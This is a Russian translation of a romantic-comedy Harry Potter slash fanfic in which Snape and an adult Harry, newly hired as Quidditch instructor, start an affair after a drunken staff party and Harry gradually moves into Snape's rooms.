Только один раз

Oh, Just This Once

Автор: Telanu 
Переводчик: Ольга. (Разрешение на перевод получено)
Жанр:
romance, humor
Категория: слэш
Герои:
SS/HP
Рейтинг:
PG-13

Козерог: (22 декабря—19 января)
В знаменитой пьесе Шекспира Полоний говорит: "
Быть честным с самим собой." Прислушайтесь к старине Шекспиру.

Он никогда не сможет избавиться от этого парня.

Сейчас, стоя в Большом Зале и хмуро изучая болтающегося на другом конце комнаты Гарри Поттера, Северус Снейп был в этом абсолютно уверен. До начала семестра оставалось еще целых две недели, но Зал был заполнен народом, как будто уже начался Пир в честь начала учебного года – все приветствовали возвращение Гарри Поттера.  Возвращение в Хогварц, к работе учителя. Но ведь он вернулся не с войны, и не собирается учить ничему полезному!

Три года Поттер играл в Квиддич. А теперь его пригласили год проработать Инструктором по Квиддичу, готовясь полностью заменить Мадам Хуч, собравшуюся в следующем году увольняться. И из-за этого персонал школы поднял такую шумиху, как будто свершилось Второе Пришествие, о котором постоянно твердят магглы. Когда Северуса Снейпа принимали на работу, в его честь устроили вечеринку? В его честь поднимали флаги Слизерина? Он фыркнул. Дождешься от них.

Ну конечно, он же не был Мальчиком, Который Выжил. Он не был человеком, практически в одиночку расправившимся с Волдемортом. Он не был красавцем и героем спорта. И в данный момент это не его окружала толпа доброжелателей (большинство из них по крайней мере вдвое старше Поттера), обращавшаяся с мальчишкой так, как будто он действительно заслужил такое уважение, какого Снейп не смог добиться за долгие годы тяжелой работы.

Черт бы все побрал. Похоже, что на этом свете Великий Гарри Поттер  не оставит его в покое.

И в этот момент Поттер бросил взгляд в тот угол зала, где, наполовину скрытый в тени, стоял его бывший профессор Зелий.

Снейп почувствовал холодок, пробежавший по спине. Раздраженно мотнув головой, профессор пошел за чашкой пунша.

Все нормально. Он знал, что маленький паршивец привлекателен. Весь последний год учебы Поттера Снейпа мучил этот факт, от которого он упорно отмахивался, как от назойливой мухи. Потом мальчишка наконец закончил школу, одержал победу над Волдемортом, и исчез из поля зрения,  пытаясь как-то устраивать нормальную жизнь. Мастер Зелий решил, что эта неприятность осталась в прошлом. Жизнь стала более скучной, какой-то серой, но Снейп убедил себя, что все к лучшему. После хаоса прошедших лет неплохо было немного поскучать.

Досаждали только постоянные упоминания о мальчишке в «Ежедневном пророке». Команда Шотландии стала часто побеждать с тех пор, как в ее состав вошел Гарри Поттер. Блестящий Ловец. Все активно вычисляли шансы команды на Кубок Мира. Кульминация наступила, когда Шотландия в прошлом году завоевала этот титул. Снейп мрачно подумал, что неудачно выбрал время начать регулярно просматривать спортивную страницу. Недели не проходило без очередной фотографии, с которой ему нахально подмигивало Великое Квиддичное Дарование,  каждый раз становившееся немного старше, каждый раз все больше и больше похожее на мужчину, а не на мальчика. У Снейпа уже не получалось спокойно читать эти газеты.

Он подошел к чаше с пуншем, около которой крутилась Роланда Хуч, только что наполнившая свой стакан темно красным варевом. Что ж, можно хоть немного поразвлечься. – Итак, - произнес Снейп тем самым голосом, который, как он прекрасно знал, вызывал у любого огромное желание ударить язвительного собеседника, - вы, наверное, дрожите от предвкушения заслуженного отдыха? Уже выбрали себе домик на побережье?

Желтые глаза, казалось бы, могли прожечь его насквозь. Хуч прекрасно знала, что Снейп пользуется любым случаем, чтобы опорочить спорт, ставший смыслом ее жизни, и сама не упускала возможности отпустить какое-нибудь язвительное замечание о пользе зелий для людей, не владеющих настоящей магией. Взаимная ненависть при таком положении дел была неизбежна.

Поэтому Роланда быстро взяла себя в руки и со сладкой улыбочкой ответила. – Мне так приятно снова видеть здесь мистера Поттера, профессор Снейп. – Что-то… странное слышалось в ее голосе. – Это похоже на праздник в честь возвращения одного из домочадцев после долгой отлучки, не правда ли? Мы долго разговаривали. Мальчик так рад возвращению… так хочет оказаться полезным… так много умеет. – Желтые глаза вспыхнули. – Естественно, от вас никто не ожидает ни радости, ни волнения

Снейп моргнул, а потом сузил глаза, надеясь, что теперь выглядит угрожающе. Некоторое время Хуч молча рассматривала его.

- Конечно же, нет, - с довольным видом заключила она, и отхлебнула пунш.

Чтобы скрыть внезапное смущение (и то, что его смутило собственное смущение), Снейп наполнил стакан пуншем, и сделал большой глоток. И чуть не подавился.

Ощущения были такие, как будто он проглотил огонь. Мадам Хуч с готовностью постучала ему по спине, не особенно стараясь контролировать силу ударов. – Понравилось, да? Крепкая штучка! – проорала она, стараясь, чтобы было слышно всем, собравшимся в Зале. Эффективный прием – теперь все смотрели в их сторону.

- Это от Огневиски! Сам добавлял! Знатная выпивка получилась! – Сообщил Хагрид, стоящий рядом с Поттером. Мальчишка наблюдал за приходящим в себя профессором с задумчивым видом и легкой улыбкой на губах. Он что-то прошептал Хагриду, как будто извиняясь, потом многозначительно посмотрел на  Дамблдора  и направился к Снейпу.

Вот черт.

Снейп не мог заставить себя прекратить бросать тоскливые взгляды на дверь.  Сбежать – это недостойная мысль, тем более, что Дамблдор случайно остановился поговорить с профессором Спраут в таком месте, что загородил единственный выход из зала.  В любом случае, нельзя допускать, чтобы кто-нибудь подумал, что он боится оказаться лицом к лицу с Поттером. Это же просто бред!

Поттер уже подошел к чаше с пуншем, и Снейп замер. Мадам Хуч, ухмыльнувшись, хлопнула Гарри по спине (намного легче, чем Снейпа перед этим) и пошла поболтать с профессором МакГонагалл, давно уже с интересом наблюдавшей за происходящим.

Снейп был готов к язвительному замечанию, ухмылке, понимающему смешку – ко всему, что давало ему шанс ответить, и отбрить Поттера так, как он этого заслуживал.

Поттер наполнил пуншем свой стакан, осушил его одним глотком, и пошел дальше, не проронив ни слова.

Что?

Снейпа трясло. Натурально трясло от ярости. Чертов мальчишка, когда он успел понять, что молчание может оскорбить сильнее любых слов. Если бы он сказал хотя бы что-то вроде «Пить разучились, професcор?», Снейп, по крайней мере, мог бы ответить и поставить наглеца на место.

Поттер вернулся к Хагриду, вежливо улыбаясь полугиганту. Из-за выпитого его щеки слегка покраснели. Этот румянец чертовски соблазнительно контрастировал с бледностью кожи. У Снейпа внутри потеплело, и стараясь отвлечься от непрошенных мыслей, профессор решил, что позже может сам подойти к Поттеру и сказать что-нибудь подходящее. Он наполнил стакан и выпил его, стараясь больше не закашляться и сдержать выступающие на глазах слезы, а потом вернулся в свой темный угол.

Поттер внимательно следил за его действиями. Через несколько минут мальчишка вернулся к чаше за очередной порцией.

Так и прошел вечер. Поттер, окруженный остальными членами коллектива, принимающий поздравления и оживленно болтающий со всеми, и Снейп, одиноко стоящий в своем углу. И весь вечер они по очереди подходили к чаше с пуншем. Через некоторое время зал поплыл перед глазами Снейпа, а походка Поттера стала заметно неустойчивой. Или Снейпа просто подводило затуманенное алкоголем зрение?

Трудно сказать, сколько все это продолжалось. После четвертого стакана Снейп перестал отвечать за свое чувство времени.

Он почувствовал хлопок по плечу и осторожно повернулся. Что надо Альбусу Дамблдору в его углу? Это нарушение личного пространства.

Взгляд голубых глаз Дамблдора на этот раз был необычно суровым, хотя Снейп не видел для этого причины. – Вижу, ты очень горд собой, Северус, - укоризненно сказал директор.

Снейп удивленно моргнул. – Горд, директор? – Переспросил он, старательно выговаривая слова.

- Приходится признать, что вы с Гарри меня разочаровали. Затевать соревнование кто кого перепьет – это не то, чего я ожидал от нового сотрудника. А уж от тебявдвойне.

Снейп был настолько поражен, услышав про соревнование в выпивке, что не среагировал на остальное. Он молча таращился на директора.

Взгляд Альбуса не становился мягче. Даже наоборот. – Сегодня я согласен терпеть подобное поведение. Но только сегодня, по случаю праздника. С завтрашнего дня я ожидаю от вас с Гарри взаимоотношений коллег и профессионалов, если уж вы не способны на дружеские отношения.

- Я вообще не особенно дружелюбный человек, - сообщил Снейп, надеясь, что говорит достаточно громко и Альбус его расслышит. Откуда-то доносился странный шум, заглушающий остальные звуки. Или это у него в ушах шумит?

Но по-видимому, Альбус его услышал, потому что поморщился. – Я знаю. Я знаю о тебе больше, чем ты думаешь. Я знаю даже то, чего ты сам в себе пока не открыл. И жаль, что ты слишком пьян, и еще один мой совет пропадет даром. – Директор зевнул. – Уже поздно. Пожалуй, мне пора отдохнуть. Доброй ночи, Северус. Я надеюсь, что утром у тебя будет меньше проблем со здравым смыслом.  Если больше ничто не способно тебя научить, может хотя бы у похмелья это получится.

Снейп кивнул, стараясь сохранять полную серьезность. Похмелье, как же! Каждый хоть чего-нибудь стоящий Мастер Зелий сможет приготовить лекарство от похмелья, даже если его разбудить в три часа ночи.

После ухода Альбуса Снейп огляделся. К его удивлению, зал почти опустел. В нем оставались только Поттер и Хагрид, причем полу-гигант мирно дремал в углу. Поттер сидел на стуле и не отрываясь смотрел на Снейпа.

Да ну его, этого Дамблдора! Снейп налил себе еще один стакан пунша. Оказалось, что если к этому пойлу привыкнуть, оно очень легко проходит в глотку.

Хотя… если подумать… пожалуй, с него хватит. Шум в ушах стал еще громче, и идти по прямой уже не получалось. Не пора ли вернуться в подземелья? Да, и укладываться в постель. В его пустую, холодную постель. Борясь с искушением подольше поразмышлять о трагичности своей жизни, Снейп мрачно подумал, что это лучшее соревнование в выпивке в его жизни.

Он медленно пошел к двери, глядя прямо перед собой и сосредоточенно делая каждый шаг. Достоинство – прежде всего. Если правильно вести себя, никто не заметит, как он набрался. Правда коридор был абсолютно пуст, и его старания казались лишними… но никогда не знаешь, не выглянет ли кто-нибудь из-за угла.

- Я выиграл.

Снейп замер, услышав голос Поттера, и очень медленно повернулся. Так значит, в коридоре уже не пусто. Черт. Мальчишка, слегка покачиваясь, маячил в дверном проеме. Его щеки раскраснелись, глаза ярко блестели, а верхние пуговицы мантии были расстегнуты, обнажая…

Я… хочу все это.

Эта внезапная (хотя и не совсем неожиданная) мысль помешала Снейпу съязвить, или хотя бы спросить, что Поттер имеет в виду. И хорошо, потому что мальчишка тут же сам все объяснил.

- Я выпил еще стакан, когда вы ушли. Я выиграл.

Снейп внезапно понял, что устал. Страшно устал. Его шатало от страшной тяжести во всем теле. – Вот и молодец, - слабым голосом ответил он. – Реванш как-нибудь в следующий раз.

А все из-за того, что вслед за желанием пришло понимание, что у него этого нет. И никогда не будет. Снейп молча повернулся, чтобы уйти. Откуда-то взявшийся в горле огромный ком мешал дышать, а ноги, казалось бы, весили по тысяче фунтов каждая.

Рука, которая могла принадлежать только Поттеру, схватила его сзади за мантию. И тут же парень качнулся, чуть не повалив их обоих на пол. Вот уж чего Снейп не мог допустить!

- Что ты делаешь? – Требовательно спросил Поттер.

- Ухожу, - ответил Снейп. Признаться, ему было неприятно видеть сердитое выражение глаз своего молодого недруга. – Собираюсь ложиться. И тебе советую. Дамблдор, - он был очень горд, что ухитрился выговорить такое непростое имя, - недоволен нашим поведением.

К его удивлению, Поттера это огорчило. – Я заметил. Ненавижу его разочаровывать. Он хороший человек. Он лучший в мире, - пылко добавил Гарри, глядя Снейпу в глаза.

- Да. Согласен. Только отцепись.

- Нет.

- Почему это? – Куда делся его разум. В такой ситуации можно было сказать что-нибудь пооригинальнее, чем «почему нет». Чертов Огневиски.

- По-тому что, - объяснил Поттер,  - за проигрыш нужно платить.

- Платить? С чего бы это? Не буду, - заявил возмущенный Снейп. – Мы не заключали пари. Даже спора настоящего не было.

- Спор был, - заупрямился Поттер. – И теперь…

- Иди отсюда, глупый мальчишка. – О, это уже лучше.

Сработало. Поттер с обиженным видом отпустил мантию и отступил. Несколько секунд они молча смотрели друг на друга. Снейп смутно припоминал, что собирается вернуться в подземелья. Кажется, нужно идти влево… Или нет?

- Ты всегда считал меня глупым мальчишкой, - грустно сказал Поттер.

Да, неожиданный поворот. И Снейп был абсолютно уверен, что не желает разбираться с остальными Поттеровскими идеями. – Это потому, что ты всегда вел себя как глупый мальчишка. И сейчас продолжаешь в том же духе. Убирайся.

- Знаешь, я не собирался этого делать, - еще одно откровение Поттера сопровождалось широким жестом, из-за которого парень чуть было не свалился на пол. – Я не собирался… я хотел подождать… посмотреть, вдруг ты… вдруг что-то изменилось, и ты можешь… но потом я пошел и все испортил… - его трагическому взгляду позавидовал бы сам Шекспир. Оказывается, Поттер совершенно не умеет пить. Снейп намного медленнее соображал и вокруг все слегка плыло, но он все же соображал. А Поттер нес полную чушь.

- Не пейте, если не умеете, мистер Поттер, - назидательно сказал Снейп.

Поттер уставился на него. – Ты когда-нибудь хотел меня трахнуть? – Весьма настойчиво спросил он.

Снейп в очередной раз потерял дар речи.

- Ну? Хотел? – Снова спросил Поттер, на этот раз гораздо резче. – Вре… иногда, ну знаешь, в седьмом классе… я думал…ты всегда на меня смотрел. Но я не был уверен. Только думал… - его голос оборвался. – А знаешь что? По-моему, ты хочешь.

Для трезвого Снейпа не было бы проблемой оборвать мальчишку, заставить его самомнение съежиться до размеров муравья, а потом гордо удалиться. И плевать на то, что парень в чем-то прав. Но сейчас он оказался способен только на то, чтобы ошарашено соображать «Неужели это было настолько заметно. Если даже Поттер догадался…»

- Но все равно, -  сбивчиво продолжал Поттер, - я хотел знать точно. Я об этом думал. Все эти годы. Пока меня здесь не было. И я занимался сексом, - неожиданно громко добавил он. – Сколько угодно секса. Все девчонки хотят переспать с игроком из сборной, а уж со знаменитым Гарри Поттером… но им всем плевать...

Он не желает этого слушать. Зажав себя в кулак, Снейп снова повернулся, чтобы уйти. Но эта проклятая рука опять вцепилась в него, на этот раз чуть ниже плеча.

- Подожди, - жалобно попросил Поттер, заставляя Снейпа повернуть голову. И поцеловал его.

Снейп замер, соображая, не допился ли он до белой горячки. Вряд ли. Для галлюцинации Поттер мог бы целоваться лучше. Они оба слишком много выпили, чтобы у них хоть что-то получилось хорошо. Когда Гарри отстранился, Снейп не чувствовал ничего, кроме замешательства.

Мальчишка снова смотрел на него, хлопая ресницами, но уже без прежнего жалобного выражения. – Об этом я и говорил – я думал о тебе, все время, и когда я решил вернуться в школу, я это из-за… то есть я не хотел сразу… я хотел сначала посмотреть. Знаешь, это серьезно. Я не хочу оскорблять твоих чувств. – Ох уж эти огромные глазищи. – Я не хочу сделать тебе больно, и не хочу, чтобы ты…

Снейп почти не слушал, что бормочет мальчишка, только следил за движениями его влажных после поцелуя губ.

- Но я напилс и сделал это прямо сегодня, - закончил свою путанную мысл Поттер. После паузы он сделал вдох и выпалил. – Можно я пойду с тобой?

Можно что?

Если бы Снейп был трезвым…

…но трезвым он не был.

Никогда? А почему обязательно никогда? Может только один раз…

- Хорошо, - согласился он, и позволил Поттеру ухватится за руку, когда они нетвердой походкой направились в подземелья.

Водолей: (20 Января – 18 Февраля)

Вы поражаете окружающих, а порой и самого себя, пускаясь в авантюры после очень недолгих сомнений.

Пока Снейп спал, какой-то зловредный домовый эльф засунул ему в рот грязный носок.

Это было единственным объяснением отвратительной сухости во рту. Казалось, там не было ни капли слюны. Никогда в жизни. И голова. О, голова! В нее как-то ухитрились запихать второй носок.

Снейп заставил себя двигаться, и после нескольких весьма неприятных минут исследований выяснил, что лежит на кровати. Без рубашки, но в брюках. И в ботинках.

Из ванной доносился шум льющейся из крана воды.

Снейп моргнул. Он оставил кран открытым? Судя по отвратительному ощущению грязных волос, вчера вечером он не принимал душ. Но вдруг он так напился, что открыл кран и тут же ушел? И к это к лучшему – после вчерашнего с него сталось бы утонуть в ванной. Только вот пол, наверное, залило. Надо бы пойти проверить.

Попытка подняться. Стон. Снейп плюхнулся на подушку, решив отложить проверку на потом.

Шум воды внезапно затих, что заставило бы Снейпа удивленно поднять бровь, если бы опыт не подсказывал, что будет очень больно. Перечное зелье. Вот что ему нужно. Срочно. Снейп не кривил душой, заявляя, что сможет приготовить это зелье даже во сне. Во сне – да, но не в состоянии глубокого похмелья. Потому что для работы над зельем надо подняться с кровати. Снейп закрыл глаза, пытаясь справиться с собственным телом. Через некоторое время внутренности вроде бы вернулись на свои места.

И тут дверь ванной распахнулась. Глаза Снейпа последовали ее примеру.

Гарри Поттер, лопни его глаза! Гарри Поттер в банном халате Снейпа! А под халатом на мальчишке было одето не больше, чем в момент появления на свет. Снейп мгновенно связал это зрелище с тем, что сам он был без рубашки, и на него обрушились воспоминания прошлой ночи, прихватив за собой очередной приступ мигрени. Он вспомнил неуклюжий поцелуй… вспомнил, как спотыкался на ступенях по пути в подземелья и как Поттер то и дело хватался за него, чтобы не упасть. Вспомнил даже тихий смех мальчишки, когда Снейп никак не мог снять с двери защитное заклинание. А вот дальнейшее оставалось сплошным темным пятном.

Помоги ему Мерлин, неужели они…

- Доброе утро, Северус, - улыбнулся Поттер, как ни странно, бодрый как обычно. Потом он без лишних церемоний сбросил халат, и начал собирать свою одежду, разбросанную по полу. – Я разбудил тебя? Извини.

В голове у Снейпа крутилось не меньше тысячи вопросов, но подсознание быстро выбрало из них самый наболевший.

- Почему ты нормально себя чувствуешь? – Проскрипел Снейп, и тут же поморщился от боли.

Поттер на мгновение поджал губы, но потом понимающе улыбнулся. – О, у меня никогда не бывает похмелья, - объяснил он таким тоном, как будто говорил о самой естественной вещи на свете. – Хагрид рассказывал, что мой отец тоже не болел по утрам. Думаю, это наследственное. Повезло мне, правда? А то бы после вчерашнего… - он оглядел Снейпа, бессильно растянувшегося на кровати. – А вот ты, похоже, не настолько удачлив. Перечное зелье в запасе есть?

- Я… - Снейп с трудом махнул в сторону шкафчика, стоящего у противоположной стены. Того самого шкафчика, до которого он не мог добраться даже ради спасения собственной жизни. – Э-э-э… верхняя полка.

Поттер, на котором не было ничего, кроме трусов, неспешно прошел через комнату, открыл шкафчик и несколько секунд изучал его содержимое, пока наконец не потянулся за маленькой бутылочкой, пристроившейся на верхней полке. – Вот она. Надеюсь, не испортилась. – Вернувшись к кровати, мальчишка, к ужасу Снейпа, уселся с ним рядом – Я могу еще чем-нибудь помочь? – Прохладная ладонь легко погладила Снейпа по руке.

Северус еле сдержался, чтобы не отдернуть руку. – Нет, - в полном замешательстве ответил он. Да, его брюки на месте, но то, как ведет себя Поттер… Что, черт побери, произошло ночью?

Если… если они занимались лю… сек… чем-нибудь интересным, Снейпа до конца жизни будет мучить мысль о том, что он ничего не запомнил. Потому что он абсолютно уверен – это никогда больше не повториться.

Будь все проклято! Он просто должен знать точно!

- Что, - начал он, и встретился взглядом с зелеными глазами Поттера, от чего дыхание перехватило, и сердце забилось в отчаянном темпе. Этот момент обещал стать самым кошмарным и унизительным в жизни Снейпа. А это говорит о многом, если вспомнить остальные моменты его жизни. – Что произошло? – Он старался сохранять как можно более строгое выражение лица.

Поттер выглядел озадаченным. – Что ты имеешь в виду? – Будь он проклят! Он прекрасно знает, что Снейп имеет в виду! Должен знать!

Снейп стиснул зубы. Если Поттер и на этот раз не ответитвсе, спокойно. Возьми себя в руки. – Что – произошло – прошлым – вечером? – Прошипел он. – Я – не – помню.

К счастью для личной безопасности Поттера, мальчишка мягко улыбнулся. – Да ничего особенного, - тихо ответил он. – Сам видишь, мы сняли с тебя рубашку, но дальше дело не зашло. Я действительно слишком напился. – Судя по виду мальчишки, он был огорчен таким поворотом событий. – Должен тебе признаться, что если говорить о случайных связях, это худшее, что у меня было.

Снейп почувствовал, что у него пылает лицо. – Я не виноват, что ты не умеешь пить, Поттер, - рявкнул он, и тут же пожалел об этом, потому что сердце снова начало болеть от одного звука его собственного голоса. – А что, много было случайных связей? Последний в длинном ряду, да? Этого ты добивался? О, Мерлин!

Поттер только пожал плечами. – Да было несколько в последние пару лет. Я, честно говоря, в одном месте не задерживался. – Он бросил внимательный взгляд на Снейпа. – Но такого кошмара еще не случалось.

Если бы Снейпа оставалось хоть немного сил, он придушил бы поганца.

- Так что мы должны попробовать еще раз, - продолжил Поттер, и желание Снейпа прибить мальчишку утонуло в полном шоке. – Я приду сегодня вечером, ладно?

Снейп открывал и закрывал рот, как рыба, выброшенная на берег – Ты, - с трудом выдавил он, а потом прикрыл глаза. – Извини, но ты кажется сказал…

- Что нам нужно провести вместе еще одну ночь, - быстро повторил Поттер. – Надеюсь, что на этот раз все выйдет лучше. На, выпей наконец свое зелье. – Снейп почувствовал прикосновение холодного стекла к руке. – у нас с Роландой сегодня масса дел, - продолжил Поттер, - так что до вечера не увидимся. Я бы поцеловал тебя на прощание, но сомневаюсь, что это будет приятно, больно уж от нас обоих перегаром несет. Лучше подождать. Во сколько мне можно прийти?

Снейпу понадобилось время, чтобы снова обрести дар речи. Вновь обретенная речь оказалась слегка бессвязной, но это уже не имело значения. – Что ты о себе возомнил… Ты самонадеянный маленький… если я вчера напился до потери рассудка…. Что дает тебе право считать, что я хочу…. – Что за редкостный поганец! Похоже, это действительно наследственное – такой же самодовольный тип, как и его отец.

Только вот почему он ТАК на меня смотрит?

- То, что ты сказал, - спокойно ответил Поттер. – Ты вчера сказал кое-что… ну и теперь я уверен, что ты позволишь мне вернуться.

…Что?

Поттер закончил одеваться под ошарашенным взглядом Снейпа, так и не сумевшего придумать, что ответить наглецу. Наконец, парень собрался уходитьПодожди! – окликнул Снейп. – Подожди! Чтоо чем ты говорил? Что такое я ляпнул вчера?

- Так я буду часов в одиннадцать, - легкомысленно сообщил парень, и захлопнул за собой дверь.

Снейп тупо уставился на эту дверь. Потом на потолок. Потом на бутылку Перечного зелья, которую до сих пор держал в руке. Он поразмышлял, хватит ли у него сил на то, чтобы запустить бутылкой в стену, но потом сдался, и просто поставил склянку на место.

Зелье подействовало слишком быстро. А ему уже начало нравиться быть больным и несчастным.

День еле тащился.

Другим словом это не назовешь. Ну, если только подобрать синонимы. Тащился, полз, спотыкался, временами вообще пробуксовывал на месте.  Большую часть этого невыносимого дня Снейп провел в своем кабинете, зарывшись в свитки пергамента, на которых он пытался написать что-нибудь дельное. Некоторые из этих листков были письмами Поттеру.

Убирайся. Оставь меня в покое. Зачем тебе это нужно. Что я сказал прошлой ночью.

В конце концов ни одно из этих писем не было отправлено. Резкое письмо могло помешать тому, чего он хотел. А хотел он секса с Гарри Поттером. Пора, наконец, признаться в этом, хотя бы самому себе.

Мерлин, оставалось надеяться, что трезвым мальчишка целуется лучше.

Снейп уставился на очередной испорченный рецепт зелья, смял его, и отправил в корзину вслед за письмами.

Одиннадцать вечера. Очередной день лета подошел к концу. Через некоторое время Гарри Поттер и Северус СНей последовали его примеру.

Снейп, тяжело дыша, откинулся на подушку. Поттер рухнул ему на грудь, от чего Снейп чуть не задохнулся окончательно. – Извини, - хрюкнул мальчишка… нет, нет, после этой ночи стало абсолютно ясно, что мальчишкой Поттера называть просто смешно…молодой человек, устраиваясь сбоку.

- Это было замечательно, - удовлетворенно вздохнул он.

Снейпу хотелось бы ответить какой-нибудь саркастичной репликой, но получилось только молча кивнуть в знак согласия. Больше, чем замечательно. Трезвость сыграла свою роль: Поттер был ничем, если не мог сосредоточиться. А вот если мог… И кстати, целовался он хорошо. Даже слишком хорошо.

Замечательно.

Снейп закрыл глаза, стараясь отпечатать в памяти каждый момент. Поттер, ворвавшийся в его комнаты после короткого, нетерпеливого стука в дверь, и чуть не сбивший Снейпа с ног, прямо от двери бросившись ему на шею. А потом….Потом желание вспыхнуло так, как будто на обоих наложили Возбуждающие чары. Одежда в буквальном смысле трещала, когда они срывали ее друг с друга. Танец обнаженных тел, вкус губ Поттера – сначала свежий, пахнущий мятой, а позже солоноватый от спермы Северуса.

Он должен запомнить все это.

Еще одно мягкое прикосновение губ к его губам. – Я так давно об этом мечтал, - прошептал Поттер, заставив Снейпа ответить незапланированным «Я тоже» и тут же пожелать отрезать свой дурацкий язык. Но Поттер больше ничего не сказал, только тихо муркнул и снова поцеловал Северуса.

После оргазма все кажутся такими расслабленными и открытыми. Снейп решил воспользоваться случаем и задать мучивший его вопрос. – Э-э-э… ты что-то такое упоминал утром… что я там сказал прошлой ночью?

Он с ужасом ожидал ответа, но услышал только сдавленный смешок.

Черт.

Следующее утро было кошмарным, как и положено быть утру-после-того-самого. По крайней мере, таким оно было для Снейпа. Поттер, судя по всему, чувствовал себя как дома, и спокойно одевался под настороженным взглядом Снейпа. – Во сколько мне можно придти сегодня? – Поинтересовался он как бы между делом.

Снейп вытаращил глаза. – Если мне память не изменяет, ты говорил об одной ночи, - прошипел он, и тут же проклял себя в душе. С другой стороны, он до сих пор не верил, что Поттер его не дурачит.

Поттер помолчал пару секунд. – Говорил, - признался он. – Но… было же так хорошо. Почему бы тогда не провести вместе еще одну ночь? Если конечно ты не возражаешь, - добавил парень, и на его лице впервые с того пьяного вечера появилась тень неуверенности.

Снейп поймал себя на том, что кивает. – В одиннадцать… нормально.

Поттер расцвел. Снейпу снова стало трудно дышать.

Он полагал, что в его жизни уже слишком поздно что-то менять.

Две ночи быстро превратились в три. В четыре. В пять. В неделю.

Снейп старался быть осторожным, но Поттера, похоже, не заботило сохранение их отношений в тайне. Он мог спросить прямо за общим столом «Сегодня как обычно, Северус?» и наблюдать за Минервой, подавившейся супом. Альбус пару раз поднимал бровь, но его голубые глаза больше не становились сердитыми. Правда после того вопроса Снейп долго не решался посмотреть директору в лицо. Он чувствовал себя как ребенок, пойманный за чем-то предосудительном. В любом случае, официальных осуждений от начальства не прозвучало.

Прошла еще неделя. Начался учебный год. Через два месяца Снейп обнаружил у себя в ванной зубную щетку Поттера. Еще через месяц в шкафу появилось кое-что из Поттеровской одежды. Снейп никогда не замечал, чтобы парень что-нибудь приносил с собой. Эти вещи просто… появлялись.

Поотер стал садиться рядом за столом и на квиддичных матчах. Студенты перешептывались. Снейп говорил себе, что так не может продолжаться.

- Пот.. Гарри. Я серьезно. Я должен знать. Что я сказал той ночью? Да ответь ты, Мерлина ради!

- Х-р-р-р

- О, сколько можно

Он собирался набраться решимости и задать этот вопрос при свете дня, когда Поттер не сможет просто притвориться спящим. Если, конечно, он не начал употреблять наркотики, но ничего подобного Снейп за ним не замечал. Он много чего не замечал за Поттером. Фактически…

- Я вообще ничего не говорил, так ведь? – Тихо, но весьма настойчиво спросил Снейп за ланчем. Поттер удивленно моргнул, оторвавшись от пирога с патокой.

- Чего не говорил? Когда?

- В ту, первую ночь, - прорычал Снейп. – Ты утверждаешь, что я сказал нечто, позволившее тебе решить, что я разрешу тебе придти еще раз. Что это было? – Северус почувствовал, что потеет. Прошло пять месяцев, а он только сейчас решился задать этот вопрос? Что с ним творится?

Но Поттер только мягко улыбнулся. – Неужели не помнишь?

- Если бы я помнил, я бы не стал тебя спрашивать, идиот, - рявкнул Снейп. Как у Поттера получается заставлять его терпеть все это…

Терпеть пришлось и на этот раз, потому что Поттер только пожал плечами. – А как ты думаешь? Что ты обычно говоришь, когда напьешься и окажешься с кем-нибудь в постели?

- Обычно со мной такого не случается. Прекрати ИГРАТЬ со мной, Поттер, - прошипел Снейп сквозь зубы. – Ты вообще-то знаешь ответ на мой вопрос? Я начинаю думать, что ты все просто придумал. Ты же сам говорил, что заснул. Нагрузился так, что заснул. – Снейп ухмыльнулся. – Так что ты хотел мне наплести? Что я объяснялся в вечной любви?

Поттер слегка помрачнел, но все же улыбался. – Нет. Такого ты никогда бы не сказал, Северус. Даже пьяным.

- Я знаю, - рявкнул Снейп, заставив остальных учителей покоситься в их сторону, и снова понизил голос. – Ответь мне. Немедленно.

- Не сейчас, - прошептал Поттер, и осторожно прикоснулся рукой к колену Сейпа, пользуясь тем, что стол скрывал это он окружающих. – Позже. Вечером. Я обещаю, Северус. И пожалуйста, зови меня Гарри.

- Ты пообещал, - прорычал Снейп.

- Да, я пообещал.

- Прекрасно. Значит до вечера.

- До вечера.

Весь день у Снейпа было ощущение, что у него в животе носится снитч. Что бы там не наговорил ему Пот… Гарри, это все равно неправда, пусть даже сам парень от души верит в свои слова. Он был очень пьян. Он мог вообразить что угодно.

А может и нет. Снейп тоже был пьян. Он мог сказать… Мерлин, да он мог ляпнуть что угодно!

И этим вечером все должно проясниться.

После ужина Снейп необычно долго шатался по подземельям, не решаясь вернуться к себе и ждать Гарри в пустой комнате. Только полдевятого он взял себя в руки и подошел к своей двери.

Открыл ее и замер в проеме. Рядом с его комодом стоял еще один, а распахнутая дверь платяного шкафа позволяла видеть, что вещи Снейпа сдвинуты в сторону, и рядом с ними развешаны, судя по количеству, все мантии Гарри и вдобавок форма для квиддича. На полу валялись три открытых чемодана. На каминной полке, рядом со старыми часами из позолоченной бронзы (которые Снейп остановил за то, что они слишком громко тикали) красовался кубок Чемпионата Мира по Квиддичу.

Из ванной слышались звуки какой-то возни. Потом оттуда показался Гарри. Снейп изумленно уставился на своего…партнера?любовника?... несущего четвертый, пустой, чемодан.

- О, ты сегодня рано, - как ни в чем ни бывало сказал  Гарри.

- Да? – Слабым голосом откликнулся Снейп. – А что, черт возьми, ты тут устроил?

- Да вот решил перенести кое-какие вещи, - небрежно ответил Гарри. – Ты же не будешь возражать? Тут уже несколько моих шмоток было, ты не стал ругаться, ну и я подумал, что все нормально, если…

- А комод?

Гарри пожал плечами. – У тебя огромные комнаты. Куча пустого места. Даже немногонеуютно, знаешь ли. А так мы не перепутаем одежду. К тому же мои вещи не провоняются зельями и

Снейп напрягся. – Не провоняются чем?

- Ты не возражаешь против кубка на камине?

- Что ты здесь ДЕЛАЕШЬ? – Заорал Снейп. К последнему слову его голос поднялся до истерического визга.

Гарри уставился на него. – Ты хорошо себя чувствуешь? – Обеспокоено спросил парень после нескольких секунд молчания.

- Я..я… мне нужно выпить. Нет, не смей наливать мне ни капли. – С этого-то все и началось. – Просто сядь, скажи мне, что обещал, а…

- Сначала я хотел сказать, что переезжаю, - жизнерадостно сообщил Гарри.

Слово «убирайся» застыло у Снейпа на языке. – Ты? – Еле выговорил он вместо этого. Ничего подобного не должно случиться. Гарри. Здесьсобирается остаться? Что за очередная шутка?

- Конечно, если ты не будешь возражать. Я же все равно каждую ночь провожу здесь, а днем я почти не бываю в замке… Я не буду мешаться у тебя под ногами, Северус, - добавил Гарри, впервые за весь этот странный разговор выглядящий озабоченным, как будто до него только сейчас дошло, что он, возможно, вышел за рамки и требует от Снейпа слишком многого.

Сам факт твоего существования мешается у меня под ногами! Но вслух Снейп ничего не сказал. Вместо этого он сел на кровать (потому что оба кресла были заняты вещами Гарри).

